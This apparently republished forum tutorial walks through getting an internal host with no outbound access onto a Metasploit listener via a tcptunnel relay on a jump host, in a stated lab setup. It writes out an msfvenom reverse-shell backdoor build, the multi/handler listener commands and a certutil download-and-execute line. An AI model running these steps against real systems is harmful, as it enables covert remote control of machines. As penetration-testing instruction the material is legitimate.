安全矩阵

 找回密码
 立即注册
搜索
查看: 2791|回复: 0

利用 TCP 隧道让内网不出网主机上线 MSF

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2022-2-23 20:35:59 | 显示全部楼层 |阅读模式
原文链接:利用 TCP 隧道让内网不出网主机上线 MSF

今天测试的环境如下:
内网网段:192.168.142.0/24
跳板机 IP:192.168.142.110
不出网主机 IP:192.168.142.113(windows 2008 x64)
攻击机网段:192.168.0.0/24
MSF IP:192.168.0.12(可以是任意公网 IP)
接下来使用的建立 TCP 隧道的工具 tcptunnel,项目的地址:
https://github.com/vakuum/tcptunnel
下载源码,可以在与跳板机相同的系统上编译,然后将编译好的程序上传至跳板机执行。执行名:
./tcptunnel --local-port=1080 --remote-port=4444 --remote-host=192.168.0.120 --fork --buffer-size=8192 --stay-alive

命令执行成功之后,会监听 1080 端口,然后将该端口收到的所有数据转发至 192.168.0.120 的 4444 端口。
接下来使用 msfvenom 生成一个后门:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.110 lport=1080 -f exe -o shell.exe

远程连接的 IP 填跳板机的 IP,端口填 1080,然后使用 msf 监听端口 4444:
  1. <pre>msf6 > use exploit/multi/handler</pre>

  2. <pre>[*] Using configured payload generic/shell_reverse_tcp</pre>

  3. <pre>msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp</pre>

  4. <pre>payload => windows/meterpreter/reverse_tcp</pre>

  5. <pre>msf6 exploit(multi/handler) > set LHOST 192.168.0.120</pre>

  6. <pre>LHOST => 192.168.0.120</pre>

  7. <pre>msf6 exploit(multi/handler) > set LPORT 4444</pre>

  8. <pre>LPORT => 4444</pre>

  9. <pre>msf6 exploit(multi/handler) > run -j</pre>
复制代码



接下来将生成好的后门,上传至不出网主机,跳板机是个 web 服务器,将后门文件先上传至跳板机,然后在不出网主机上执行命令,从跳板机下载后门执行:
certutil.exe -urlcache -split -f http://192.168.142.110/hackable/uploads/shell.exe
然后执行 shell.exe,发现 msf 上线了:

切换到 meterpreter 查看 IP:

至此问题解决,通过跳板机建立 TCP 隧道,然后让不出网主机通过跳板机上线。


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-24 04:56 , Processed in 0.014785 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表